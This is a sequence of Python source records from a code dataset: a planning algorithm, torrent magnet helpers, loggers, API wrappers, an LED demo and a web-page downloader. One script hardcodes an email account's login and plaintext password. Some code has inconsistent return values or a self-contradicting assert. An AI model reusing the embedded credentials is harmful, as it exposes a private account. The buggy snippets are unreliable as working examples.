*new_precond_args)\r\n\t\t\t\t\t\tnew_preconds.append(new_precond)\r\n\t\t\t\t\tnew_effects = []\r\n\t\t\t\t\tfor effect in action.effect:\r\n\t\t\t\t\t\tnew_effect_args = []\r\n\t\t\t\t\t\tfor arg in effect.args:\r\n\t\t\t\t\t\t\tif arg in bindings:\r\n\t\t\t\t\t\t\t\tnew_effect_args.append(bindings[arg])\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tnew_effect_args.append(arg)\r\n\t\t\t\t\t\tnew_effect = Expr(str(effect.op), *new_effect_args)\r\n\t\t\t\t\t\tnew_effects.append(new_effect)\r\n\t\t\t\t\texpansions.append(Action(new_expr, new_preconds, new_effects))\r\n\r\n\t\treturn expansions\r\n\r\n\tdef select_precondition(self):\r\n\t\tnumber_of_ways = dict()\r\n\t\tactions_for_precondition = dict()\r\n\t\tfor element in self.agenda:\r\n\t\t\topen_precondition = element[0]\r\n\t\t\tpossible_actions = list(self.actions) + self.expanded_actions\r\n\t\t\tfor action in possible_actions:\r\n\t\t\t\tfor effect in action.effect:\r\n\t\t\t\t\tif effect == open_precondition:\r\n\t\t\t\t\t\tif open_precondition in number_of_ways:\r\n\t\t\t\t\t\t\tnumber_of_ways[open_precondition] += 1\r\n\t\t\t\t\t\t\tactions_for_precondition[open_precondition].append(action)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tnumber_of_ways[open_precondition] = 1\r\n\t\t\t\t\t\t\tactions_for_precondition[open_precondition] = [action]\r\n\r\n\t\tnumber = sorted(number_of_ways, key=number_of_ways.__getitem__)\r\n\t\t\r\n\t\tif len(actions_for_precondition[number[0]]) == 0:\r\n\t\t\treturn None, None\r\n\r\n\t\tact1 = 
None\r\n\t\tfor element in self.agenda:\r\n\t\t\tif element[0] == number[0]:\r\n\t\t\t\tact1 = element[1]\r\n\t\t\t\tbreak\r\n\r\n\t\tif number[0] in self.expanded_actions:\r\n\t\t\tself.expanded_actions.remove(number[0])\r\n\r\n\t\tprint('NUMBER 0: ', number[0])\r\n\t\treturn number[0], act1, actions_for_precondition[number[0]]\r\n\r\n\tdef cyclic(self, graph):\r\n\t\tnew_graph = dict()\r\n\t\tfor element in graph:\r\n\t\t\tif element[0] in new_graph:\r\n\t\t\t\tnew_graph[element[0]].append(element[1])\r\n\t\t\telse:\r\n\t\t\t\tnew_graph[element[0]] = [element[1]]\r\n\r\n\t\tpath = set()\r\n\r\n\t\tdef visit(vertex):\r\n\t\t\tpath.add(vertex)\r\n\t\t\tfor neighbor in new_graph.get(vertex, ()):\r\n\t\t\t\tif neighbor in path or visit(neighbor):\r\n\t\t\t\t\treturn True\r\n\t\t\tpath.remove(vertex)\r\n\t\t\treturn False\r\n\r\n\t\tvalue = any(visit(v) for v in new_graph)\r\n\t\tprint('Cyclic: ', value)\r\n\t\treturn value\r\n\r\n\tdef add_const(self, constraint, constraints):\r\n\t\t# print('constraints: ', constraints)\r\n\t\tif constraint[0] == self.finish or constraint[1] == self.start:\r\n\t\t\treturn constraints\r\n\t\tnew_constraints = set(constraints)\r\n\t\tnew_constraints.add(constraint)\r\n\t\t# print('new_constraints: ', new_constraints)\r\n\t\t# print('Checking cyclicity:', self.cyclic(new_constraints))\r\n\t\tif self.cyclic(new_constraints):\r\n\t\t\treturn constraints\r\n\t\treturn new_constraints\r\n\r\n\tdef protect(self, causal_link, action, constraints):\r\n\t\tundoes_precondition = False\r\n\t\t# print('action: ', action.name, action.args)\r\n\t\tfor effect in action.effect:\r\n\t\t\tif (str(causal_link[1].op) == 'Not' + str(effect.op)) or ('Not' + str(causal_link[1].op) == str(effect.op)) and causal_link[1].args == effect.args:\r\n\t\t\t\tprint('action: ', action, '\\'s effect: ', effect, 'undoes', causal_link[1])\r\n\t\t\t\tundoes_precondition = True\r\n\r\n\t\tif action != causal_link[0] and action != causal_link[2] and undoes_precondition:\r\n\t\t\t# promotion always\r\n\t\t\t# constraints.add((action, causal_link[0]))\r\n\t\t\t# if random.randint(1, 101) > 50:\r\n\t\t\t# \tprint('Promotion')\r\n\t\t\t# \tconstraints = self.add_const((action, causal_link[0]), constraints)\r\n\t\t\t# else:\r\n\t\t\t# \tprint('Demotion')\r\n\t\t\t# \tconstraints = self.add_const((causal_link[2], action), constraints)\r\n\t\t\t# always promotion\r\n\t\t\tconstraints = self.add_const((action, causal_link[0]), constraints)\r\n\t\treturn constraints\r\n\r\n\tdef execute(self):\r\n\t\t# print('start: ', self.start)\r\n\t\t# print('finish: ', self.finish)\r\n\t\t# print('actions: ', self.actions)\r\n\t\t# print('constraints: ', self.constraints)\r\n\t\t# print('agenda: ', self.agenda)\r\n\r\n\t\t# select and remove <G, act1> from Agenda\r\n\t\tstep = 1\r\n\t\tlast_constraints = None\r\n\t\tlast_causal_links = None\r\n\r\n\t\twhile len(self.agenda) > 0 and step < 200:\r\n\t\t\tprint(f'STEP {step} ---------------------------------------------------------------')\r\n\t\t\tstep += 1\r\n\r\n\t\t\tG, act1, possible_actions = self.select_precondition()\r\n\t\t\tact0 = possible_actions[0]\r\n\t\t\t# print('act0: ', act0.name, act0.args)\r\n\t\t\t# print('G: ', G)\r\n\t\t\t# print('act1: ', act1.name, act1.args)\r\n\t\t\tself.agenda.remove((G, act1))\r\n\r\n\t\t\t# Actions = Actions U {act0}\r\n\t\t\tself.actions.add(act0)\r\n\r\n\t\t\t# Constraints = add_const(start < act0, Constraints)\r\n\t\t\tself.constraints = self.add_const((self.start, act0), self.constraints)\r\n\r\n\t\t\t# for each CL E 
CausalLinks do\r\n\t\t\t# \tConstraints = protect(CL, act0, Constraints)\r\n\t\t\tfor causal_link in self.causal_links:\r\n\t\t\t\tself.constraints = self.protect(causal_link, act0, self.constraints)\r\n\r\n\t\t\t# Agenda = Agenda U {<P, act0>: P is a precondition of act0}\r\n\t\t\tfor precond in act0.precond:\r\n\t\t\t\tself.agenda.add((precond, act0))\r\n\r\n\t\t\t# Constraints = add_const(act0 < act1, Constraints)\r\n\t\t\tself.constraints = self.add_const((act0, act1), self.constraints)\r\n\r\n\t\t\t# CausalLinks U {<act0, G, act1>}\r\n\t\t\tif (act0, G, act1) not in self.causal_links:\r\n\t\t\t\tself.causal_links.append((act0, G, act1))\r\n\r\n\t\t\t# for each A E Actions do\r\n\t\t\t#\tConstraints = protect(<act0, G, act1>, A, Constraints)\r\n\t\t\tfor action in self.actions:\r\n\t\t\t\tself.constraints = self.protect((act0, G, act1), action, self.constraints)\r\n\r\n\t\t\tif self.constraints == last_constraints and self.causal_links == last_causal_links:\r\n\t\t\t\tbreak\r\n\t\t\tlast_constraints = set(self.constraints)\r\n\t\t\tlast_causal_links = set(self.causal_links)\r\n\r\n\t\t\tprint('agenda: ', self.agenda)\r\n\t\t\tprint('actions: ')\r\n\t\t\tfor action in self.actions:\r\n\t\t\t\tprint(action.name, action.args)\r\n\t\t\tprint('constraints: ')\r\n\t\t\tfor constraint in self.constraints:\r\n\t\t\t\tprint(constraint[0].name, constraint[0].args, ' < ', constraint[1].name, constraint[1].args)\r\n\t\t\tfor causal_link in self.causal_links:\r\n\t\t\t\tprint('<', causal_link[0].name, causal_link[0].args, ',', causal_link[1], ',', causal_link[2].name, causal_link[2].args, '>')\r\n","sub_path":"Machine Learning/Aima/partial_order_planner_5.py","file_name":"partial_order_planner_5.py","file_ext":"py","file_size_in_byte":12993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"286286242","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2007,2008 Andrew Resch <andrewresch@gmail.com>\n#\n# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with\n# the additional special exception to link portions of this program with the OpenSSL library.\n# See LICENSE for more details.\n#\n\n\"\"\"Common functions for various parts of Deluge to use.\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport base64\nimport functools\nimport locale\nimport logging\nimport numbers\nimport os\nimport platform\nimport re\nimport subprocess\nimport sys\nimport time\n\nimport pkg_resources\n\ntry:\n from urllib.parse import unquote_plus, urljoin\n from urllib.request import pathname2url\nexcept ImportError:\n # PY2 fallback\n from urlparse import urljoin # pylint: disable=ungrouped-imports\n from urllib import pathname2url, unquote_plus # pylint: disable=ungrouped-imports\n\n\nMAGNET_SCHEME = 'magnet:?'\nXT_BTIH_PARAM = 'xt=urn:btih:'\nDN_PARAM = 'dn='\nTR_PARAM = 'tr='\n\n\ndef is_infohash(infohash):\n \"\"\"\n A check to determine if a string is a valid infohash.\n Args:\n infohash (str): The string to check.\n Returns:\n bool: True if valid infohash, False otherwise.\n \"\"\"\n return len(infohash) == 40 and infohash.isalnum()\n\n\ndef is_magnet(uri):\n \"\"\"\n A check to determine if a uri is a valid bittorrent magnet uri\n :param uri: the uri to check\n :type uri: string\n :returns: True or False\n :rtype: bool\n :Example:\n >>> is_magnet('magnet:?xt=urn:btih:SU5225URMTUEQLDXQWRB2EQWN6KLTYKN')\n True\n \"\"\"\n\n if uri.startswith(MAGNET_SCHEME) and XT_BTIH_PARAM in uri:\n return 
True\n return False\n\n\ndef get_magnet_info(uri):\n \"\"\"Parse torrent information from magnet link.\n Args:\n uri (str): The magnet link.\n Returns:\n dict: Information about the magnet link.\n Format of the magnet dict::\n {\n \"name\": the torrent name,\n \"info_hash\": the torrents info_hash,\n \"files_tree\": empty value for magnet links\n }\n \"\"\"\n\n tr0_param = 'tr.'\n tr0_param_regex = re.compile(\"^tr.(\\\\d+)=(\\\\S+)\")\n if not uri.startswith(MAGNET_SCHEME):\n return {}\n\n name = None\n info_hash = None\n trackers = {}\n tier = 0\n for param in uri[len(MAGNET_SCHEME):].split('&'):\n if param.startswith(XT_BTIH_PARAM):\n xt_hash = param[len(XT_BTIH_PARAM):]\n if len(xt_hash) == 32:\n try:\n info_hash = base64.b32decode(xt_hash.upper()).encode('hex')\n except TypeError as ex:\n logging.debug(\n 'Invalid base32 magnet hash: %s, %s', xt_hash, ex)\n break\n elif is_infohash(xt_hash):\n info_hash = xt_hash.lower()\n else:\n break\n elif param.startswith(DN_PARAM):\n name = unquote_plus(param[len(DN_PARAM):])\n elif param.startswith(TR_PARAM):\n tracker = unquote_plus(param[len(TR_PARAM):])\n trackers[tracker] = tier\n tier += 1\n elif param.startswith(tr0_param):\n try:\n tier, tracker = re.match(tr0_param_regex, param).groups()\n trackers[tracker] = tier\n except AttributeError:\n pass\n\n if info_hash:\n if not name:\n name = info_hash\n return {'name': name, 'info_hash': info_hash, 'files_tree': '', 'trackers': trackers}\n else:\n return {}\n\n\ndef create_magnet_uri(infohash, name=None, trackers=None):\n \"\"\"Creates a magnet uri\n Args:\n infohash (str): The info-hash of the torrent.\n name (str, optional): The name of the torrent.\n trackers (list or dict, optional): A list of trackers or dict or {tracker: tier} pairs.\n Returns:\n str: A magnet uri string.\n \"\"\"\n\n uri = [MAGNET_SCHEME, XT_BTIH_PARAM,\n base64.b32encode(infohash.decode('hex'))]\n if name:\n uri.extend(['&', DN_PARAM, name])\n if trackers:\n try:\n for tracker in sorted(trackers, key=trackers.__getitem__):\n uri.extend(['&', 'tr.%d=' % trackers[tracker], tracker])\n except TypeError:\n for tracker in trackers:\n uri.extend(['&', TR_PARAM, tracker])\n\n return ''.join(uri)\n","sub_path":"clusterautodownloadplugin/tcommon.py","file_name":"tcommon.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"596061716","text":"import pymongo\nimport os\nimport time\nimport datetime\n\nclass csvLogger():\n def __init__(self, header_list, path = None):\n '''\n Ex:\n from altpy.lego.data_logging import csvLogger\n logger = csvLogger(['Voltage','Current'], 'C:\\\\ThisDirectory\\\\')\n logger.writeResultToCsv([5.0, 1.25])\n '''\n\n # Gets time stamp of format 2015-09-01_19-26-32\n time_stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n # Create csv filename from time_stamp\n filename_str = 'data.csv'\n\n \n if not os.path.isfile(path + filename_str):\n outputFile = open(path + filename_str, \"w\" )\n header_str = \"\"\n for k in header_list:\n header_str += str(k) + \",\"\n outputFile.write( header_str[:-1] + \"\\n\" )\n\n self.logfile_name = path+filename_str\n\n def writeResultToCsv(self, result_list):\n result_str = \"\"\n ## print result_list # for debugging\n for n in result_list:\n n = str(n)\n n = n.replace('\\r', '')\n n = n.replace('\\n', '')\n result_str += str(n) + \",\"\n result_str = result_str[:-1] + \"\\n\"\n\n # open the output file (for appending)\n log_file = 
open(self.logfile_name, \"a\" )\n log_file.write(result_str)\n # print result_str+'\\n\\n'\n log_file.close()","sub_path":"csv_writer.py","file_name":"csv_writer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"219489468","text":"import unittest\nfrom pprint import pprint\nfrom scrapy.http.response.text import TextResponse\n\nfrom lmpd.lemon.lemon.spiders.equipment_spider import EquipmentSpider\n\nclass TestEquipmentSpider(unittest.TestCase):\n\n def setUp(self):\n self.spider = EquipmentSpider(limit=1)\n \n self.response = TextResponse(\n url='www.filterunittest.de',\n body=open(f'tmp\\\\filter.equipments.htm', encoding='utf-8').read(),\n encoding = 'utf-8'\n )\n\n def test_parse_equipment(self):\n result = self.spider.parse_equipment(self.response)\n sr = sorted(list(result), key=lambda e: e.get('id'), reverse=False)\n pprint(sr)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_equipment_spider.py","file_name":"test_equipment_spider.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450220284","text":"# -*- coding: utf-8 -*-\nimport requests\n\n\nENDPOINT = 'https://api.gyazo.com/api/{}'\nUPLOAD_ENDPOINT = 'https://upload.gyazo.com/api/upload/{}'\n\nIMAGES = ENDPOINT.format('images')\nOEMBED = ENDPOINT.format('oembed')\nUPLOAD = UPLOAD_ENDPOINT.format('')[:-1]\nUPLOAD_WITH_BROWSER_SESSION = UPLOAD_ENDPOINT.format('easy_auth')\n\n\nclass MissingClientID(Exception):\n pass\n\n\nclass InvalidURLFormatError(Exception):\n pass\n\n\nclass Pyazo(object):\n def __init__(self,\n access_token,\n client_id=None,\n client_secret=None):\n self.access_token = access_token\n self.client_id = client_id\n self.client_secret = client_secret\n\n def images(self, page=1, per_page=20):\n query = {\n 'access_token': self.access_token,\n 'page': page,\n 'per_page': per_page\n }\n response = requests.get(IMAGES, data=query)\n return response.text\n\n def upload(self,\n image_path,\n referer_url=None,\n title=None,\n desc=None,\n created_at=None):\n files = {'imagedata': open(image_path, 'rb')}\n payload = {\n 'access_token': self.access_token,\n 'referer_url': referer_url,\n 'title': title,\n 'desc': desc,\n 'created_at': created_at\n }\n response = requests.post(UPLOAD, data=payload, files=files)\n return response.text\n\n def delete(self, image_id):\n payload = {\n 'access_token': self.access_token,\n 'image_id': image_id\n }\n response = requests.delete(IMAGES + '/{}'.format(image_id),\n data=payload)\n return response.text\n\n def oembed(self, url):\n if not url.startswith('http://gyazo.com/'):\n raise InvalidURLFormatError()\n\n query = {'url': url}\n response = requests.get(OEMBED, data=query)\n return response.text\n\n def upload_easy_auth(self, image_url, referer_url, title=None):\n if not self.client_id:\n raise MissingClientID()\n\n payload = {\n 'client_id': self.client_id,\n 'image_url': image_url,\n 'referer_url': referer_url,\n 'title': title\n }\n response = requests.post(UPLOAD_WITH_BROWSER_SESSION, data=payload)\n return response.text\n","sub_path":"pyazo.py","file_name":"pyazo.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621631644","text":"# 471. 
Top K Frequent Words\n# Given a list of words and an integer k, return the top k frequent words in the list.\n#\n# Example\n# Given\n#\n# [\n# \"yes\", \"lint\", \"code\",\n# \"yes\", \"code\", \"baby\",\n# \"you\", \"baby\", \"chrome\",\n# \"safari\", \"lint\", \"code\",\n# \"body\", \"lint\", \"code\"\n# ]\n# for k = 3, return [\"code\", \"lint\", \"baby\"].\n#\n# for k = 4, return [\"code\", \"lint\", \"baby\", \"yes\"],\n#\n# Challenge\n# Do it in O(nlogk) time and O(n) extra space.\n\n\nfrom heapq import heappush, heappop\n\nclass Solution:\n \"\"\"\n @param words: an array of string\n @param k: An integer\n @return: an array of string\n \"\"\"\n def topKFrequentWords(self, words, k):\n # write your code here\n \"use hash table for freqency count, then put into min heap,size k. \"\n \"why keep size k? why not put all n nodes into it? since that will make the heap operation time O(log(n)), total would be O(n log(n)). but we need O(n log(k)).\"\n \"we only keep the larget k in heap. when insert into heap, once size > k, poll one(smallest, order would be > k+1, safe to poll). poll all k elements in min heap and get our result\"\n\n \"calculate frequency\"\n\n if words is None:\n return []\n\n if k >= len(words):\n return words\n\n freq = {}\n\n for i in range(len(words)-1,-1,-1):\n if words[i] not in freq.keys():\n freq[words[i]] = 1\n else:\n freq[words[i]] += 1\n\n minheap = []\n\n i = 0\n for key in freq.keys():\n \"we need to push (freq[key],key]) to heap\"\n\n \"push one \"\n\n heappush(minheap,(freq[key],key))\n\n if i>= k:\n \"poll minimum from heap\"\n heappop(minheap)\n\n i += 1\n\n \"now we have top k words in heap, poll out and get result\"\n\n result = []\n\n for i in range(0,len(minheap)):\n result.insert(0,heappop(minheap)[1])\n\n return result\n\n\n\n# input\n# [\"yes\",\"lint\",\"code\",\"yes\",\"code\",\"baby\",\"you\",\"baby\",\"chrome\",\"safari\",\"lint\",\"code\",\"body\",\"lint\",\"code\"]\n# 3\n# Output\n# [\"code\",\"lint\",\"body\"]\n# Expected\n# [\"code\",\"lint\",\"baby\"]\n\nassert Solution().topKFrequentWords([\"yes\",\"lint\",\"code\",\"yes\",\"code\",\"baby\",\"you\",\"baby\",\"chrome\",\"safari\",\"lint\",\"code\",\"body\",\"lint\",\"code\"],3) == [\"code\",\"lint\",\"yes\"]","sub_path":"Algorithm/Python/AdvancedDataStructures/Heap/TopKFrequentWords.py","file_name":"TopKFrequentWords.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101792127","text":"# coding=<encoding name>= : # coding=utf-8\nimport yagmail\nimport yaml\n\nfrom getpathInfo import text_Path\nfrom text.del_txt import re_nine_city_erro_num\nfrom util.conf_read import ConfRead\n\nclass SendEN:\n def __init__(self, path=text_Path(), name='广州'):\n self.a = path\n self.name = name\n\n def ninety_erro(self):\n with open(self.a + \"ninety_erro.txt\", mode='a+', encoding='utf-8') as f:\n f.seek(0)\n ninety = len(f.readlines())\n if ninety >= 1:\n with open(self.a + \"ninety_erro.txt\", mode='r+', encoding='utf-8') as f:\n return f.readlines(), ninety\n else:\n return ['九十日-接口异常和天数判断-无错误\\n'], 0\n\n def ninety_empty(self):\n with open(self.a + \"ninety_empty.txt\", mode='a+', encoding='utf-8') as f:\n f.seek(0)\n ninety = len(f.readlines())\n if ninety >= 1:\n with open(self.a + \"ninety_empty.txt\", mode='r+', encoding='utf-8') as f:\n return f.readlines(), ninety\n else:\n return ['九十日-字段是否为空-无错误\\n'], 0\n\n def erro_city_num(self):\n with open(self.a + \"nine_erro_citynum.txt\", mode='a+', 
encoding='utf-8') as f:\n f.seek(0)\n erro_num = len(f.readlines())\n return erro_num\n\n def send_email_nine(self, path=text_Path()):\n e_name = ConfRead.conf_get('email.conf', 'email', 'email')\n e_r_name = yaml.load(e_name, Loader=yaml.FullLoader)\n b1, num_nine1 = self.ninety_erro()\n b1.insert(0, f'【----------九十日-接口异常和天数判断-模块错误----------】[{num_nine1}]\\n')\n b2, num_nine2 = self.ninety_empty()\n b2.insert(0, f'【----------九十日-字段是否为空-模块错误----------】[{num_nine2}]\\n')\n nine = b1 + b2\n nine_num = num_nine1 + num_nine2\n c = ''.join(nine)\n yag = yagmail.SMTP(user=\"lizechen@droi.com\", password=\"a124578\", host='smtp.263.net')\n # 邮箱正文\n\n contents_ninety = c\n\n # file1 = log_path + 'logs.log'\n # 发送邮件\n\n yag.send(e_r_name, f'[vivo]-[{self.name}]-[数据]-[国内站点]-[九十日]-[{self.erro_city_num()}]', contents_ninety)\n re_nine_city_erro_num(path)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"zuimeiAPI/util/send_email_ninety.py","file_name":"send_email_ninety.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"281681570","text":"def calcular_pagamento(qtd_horas, valor_hora):\r\n horas = float(qtd_horas)\r\n taxa = float(valor_hora)\r\n if horas <= 150:\r\n salario = horas * taxa\r\n else:\r\n h_exc = horas - 150\r\n salario = 150 * taxa + (h_exc*(1.5*taxa))\r\n return salario\r\n\r\n\r\nstr_horas = input(\"Digite a quantidade de horas: \")\r\nstr_taxa = input(\"Digite o valor da hora: \")\r\ntotal_salario = calcular_pagamento(str_horas, str_taxa)\r\nprint(\"O valor de seus rendimentos é R$\", total_salario)\r\n","sub_path":"HorasExtra.py","file_name":"HorasExtra.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"21655816","text":"import numpy as np\nimport torch\nimport torchvision\nfrom timeit import default_timer as timer\nimport torch.quantization\nimport sys\nfrom plot import plot_line_chart\n\n\n# .resnet18() # .mobilenet_v2()\n# model = torch.quantization.quantize_dynamic(original_model, {torch.nn.Linear}, dtype=torch.qint8)\n\ndef run_exp(model):\n print(f\"number of model parameters: {sum([np.prod(p.size()) for p in model.parameters()])}\")\n print(f\"model size: {sys.getsizeof(model)}\")\n # batch_size = 5\n y, x = list(), list()\n for batch_size in [1, 1, 2, 4, 8, 16, 32]:\n dt_list = list()\n num_trials = 10\n for _ in range(num_trials):\n start_time = timer()\n input_batch = torch.rand((batch_size, 3, 224, 224))\n \n if torch.cuda.is_available():\n input_batch = input_batch.to(\"cuda\")\n model.to('cuda')\n # start_time = timer()\n with torch.no_grad():\n output = model(input_batch)\n \n end_time = timer()\n\n dt = end_time - start_time\n dt_list.append(dt / batch_size) \n print(f\"bs: {batch_size} average time: {np.mean(dt_list)} (±{np.std(dt_list)})\")\n y.append(np.mean(dt_list))\n x.append(batch_size)\n return y, x\n\nif __name__ == '__main__':\n model0 = torchvision.models.mobilenet_v2(pretrained=True)\n model0.eval()\n quantized_model0 = torch.quantization.quantize_dynamic(model0, {torch.nn.Linear}, dtype=torch.qint8)\n quantized_model0.eval()\n\n mnet_y, _ = run_exp(model0)\n qmnet_y, _ = run_exp(quantized_model0)\n\n model1 = torchvision.models.resnet18(pretrained=True)\n model1.eval()\n rnet_y, _ = run_exp(model1)\n\n quantized_model1 = torch.quantization.quantize_dynamic(model1, {torch.nn.Linear}, dtype=torch.qint8)\n quantized_model1.eval()\n qrnet_y, _ = 
run_exp(quantized_model1)\n\n    # plot\n    all_y = np.asarray([mnet_y, qmnet_y, rnet_y, qrnet_y])\n    all_model_names = ['mobilenets_v2 original', 'mobilenets_v2 quantized', \n                       'resnet_18 original', 'resnet_18 quantized']\n    plot_line_chart(all_y, all_model_names)\n\n","sub_path":"labs/lab3-quantization/feature_extractor_exp.py","file_name":"feature_extractor_exp.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"41982262","text":"from ..ambilight import AmbilightStrip\r\nfrom rpi_ws281x import Color  # assumed import: Color(r, g, b) helper from the strip library; it was used below but never imported\r\nimport time\r\n\r\n\r\nclass AmbilightStripDemo:\r\n    def __init__(self):\r\n        self.ambilight_strip = AmbilightStrip()\r\n\r\n    def color_snake(self):\r\n        snake = AmbilightSnake(self.ambilight_strip)\r\n        snake.play()\r\n\r\n\r\nclass AmbilightSnake:\r\n    def __init__(self,\r\n                 strip,\r\n                 head_color=Color(0, 0, 200),\r\n                 tail_color=Color(200, 0, 0),\r\n                 initial_snake_length=5,\r\n                 growth_rate=1,\r\n                 movement_size=1,\r\n                 movement_speed=0.01,\r\n                 food_per_cycle=17,\r\n                 food_color=Color(0, 200, 0)):\r\n\r\n        self.strip = strip\r\n        self.initial_length = initial_snake_length\r\n        self.snake_position = initial_snake_length\r\n        self.snake_length = initial_snake_length\r\n        self.growth_rate = growth_rate\r\n        self.movement_size = movement_size\r\n        self.movement_speed = movement_speed\r\n        self.head_color = head_color\r\n        self.tail_color = tail_color\r\n        self.food_per_cycle = food_per_cycle\r\n        self.food_color = food_color\r\n        # integer spacing so food positions are whole pixel indices that can\r\n        # match the integer snake position\r\n        food_spacing = self.strip.numPixels() // food_per_cycle\r\n        self.food_list = []\r\n        for food_distance in range(food_per_cycle):\r\n            self.food_list.append(food_spacing * food_distance)\r\n\r\n    def play(self):\r\n        self.render_food()\r\n        print('Exit with Ctrl+C')\r\n        while True:\r\n            self.move_snake()\r\n            time.sleep(self.movement_speed)\r\n\r\n    def clear_snake(self, color=Color(0, 0, 0)):\r\n        self.strip.setPixelColor((self.snake_position - self.snake_length) % self.strip.numPixels(), color)\r\n        self.strip.show()\r\n\r\n    def render_food(self):\r\n        for food_position in self.food_list:\r\n            self.strip.setPixelColor(food_position, self.food_color)\r\n        self.strip.show()\r\n\r\n    def render_snake(self):\r\n        for i in range(self.snake_length):\r\n            if i == 0:\r\n                # draw head\r\n                self.strip.setPixelColor((self.snake_position - i) % self.strip.numPixels(), self.head_color)\r\n            else:\r\n                # draw body\r\n                self.strip.setPixelColor((self.snake_position - i) % self.strip.numPixels(), self.tail_color)\r\n        self.strip.show()\r\n\r\n    def game_over(self, wait_time=1, flash_count=4, flash_color_one=Color(0, 0, 0), flash_color_two=Color(255, 0, 0)):\r\n        for i in range(flash_count):\r\n            for pixel in range(self.strip.numPixels()):\r\n                self.strip.setPixelColor(pixel, flash_color_one if i % 2 == 0 else flash_color_two)\r\n            self.strip.show()  # push each flash frame to the strip\r\n            time.sleep(wait_time)\r\n\r\n    def move_snake(self):\r\n        self.clear_snake()\r\n        self.snake_position += self.movement_size\r\n        self.snake_position %= self.strip.numPixels()\r\n        if self.snake_length == self.strip.numPixels():\r\n            self.game_over()\r\n            self.snake_length = self.initial_length\r\n        if self.snake_position in self.food_list:\r\n            self.snake_length += self.growth_rate\r\n            self.render_food()\r\n        self.render_snake()\r\n","sub_path":"ambilight_strip/ambilight_strip_demo.py","file_name":"ambilight_strip_demo.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"430471433","text":"import base64\nimport datetime\nimport hashlib\nimport os\nfrom 
datetime import timezone, timedelta, datetime\nimport re\nimport sys\nimport time\nimport json\nfrom pathlib import Path\nfrom urllib.parse import urlparse, urlunsplit, urljoin, quote\n\nimport chromedriver_binary\nimport fire\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\nre_css_url = re.compile(r'(url\\(.*?\\))')\nwebpage2html_cache = {}\ngetting_time = 0\n\n\ndef log(s, new_line=True):\n    \"\"\"\n    Write a log message to stderr\n    \"\"\"\n    print(str(s), end=' ', file=sys.stderr)\n    if new_line:\n        sys.stderr.write('\\n')\n        sys.stderr.flush()\n\n\ndef prepare_download() -> str:\n    \"\"\"\n    Prepare the download directories\n    \"\"\"\n    download_dir_name = 'download'\n    download_dir_path = Path(download_dir_name)\n    download_dir_path.mkdir(parents=True, exist_ok=True)\n\n    download_dir_path_html = download_dir_path / \"html\"\n    download_dir_path_html.mkdir(parents=True, exist_ok=True)\n    download_dir_path_image = download_dir_path / \"image\"\n    download_dir_path_image.mkdir(parents=True, exist_ok=True)\n    download_dir_path_link = download_dir_path / \"link\"\n    download_dir_path_link.mkdir(parents=True, exist_ok=True)\n\n    download_dir_str = str(download_dir_path.resolve())\n    return download_dir_str\n\n\ndef make_site_id(url: str = \"\") -> str:\n    \"\"\"\n    Generate a site id by hashing the URL\n\n    Args:\n        url (str): URL\n    \"\"\"\n\n    result = hashlib.sha256(url.encode()).digest()\n    # log(type(result))\n    hash_str = base64.b32encode(result).decode(\"utf8\")\n    return hash_str\n\n\ndownload_dir = prepare_download()\nsite_id = \"\"\nexternal_links = []\ninternal_links = []\nbase_url = \"\"\nuser_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:75.0) Gecko/20100101 Firefox/75.0\"\n\n\ndef add_links(url: str = \"\") -> None:\n    \"\"\"\n    Classify a link as external or internal and append the URL to the matching list\n\n    Args:\n        url (str): target URL\n    \"\"\"\n    global external_links\n    global internal_links\n    global base_url\n\n    if url.lower().startswith('http'):\n        if url.count(\"/\") < 3 and base_url.startswith(url.split(\"?\")[0]):\n            internal_links.append(url)\n        elif url.count(\"/\") < 3:\n            external_links.append(url)\n        elif url.split(\"/\")[2] == base_url.split(\"/\")[2]:\n            internal_links.append(url)\n        else:\n            external_links.append(url)\n\n\ndef absurl(index, relpath: str = None, normpath: str = None):\n    if normpath is None:\n        normpath = lambda x: x\n    if index.lower().startswith('http') or (relpath and relpath.startswith('http')):\n        new = urlparse(urljoin(index, relpath))\n        return urlunsplit((new.scheme, new.netloc, normpath(new.path), new.query, ''))\n    else:\n        if relpath:\n            return normpath(os.path.join(os.path.dirname(index), relpath))\n        else:\n            return index\n\n\ndef get_contents(url: str = None, relpath: str = None, verbose: bool = True, usecache: bool = True,\n                 verify: bool = True, ignore_error: bool = False, username: str = None,\n                 password: str = None, referer_url: str = \"\"):\n    \"\"\"\n    Fetch web content over HTTP or from a local file\n\n    Args:\n        url:\n        relpath:\n   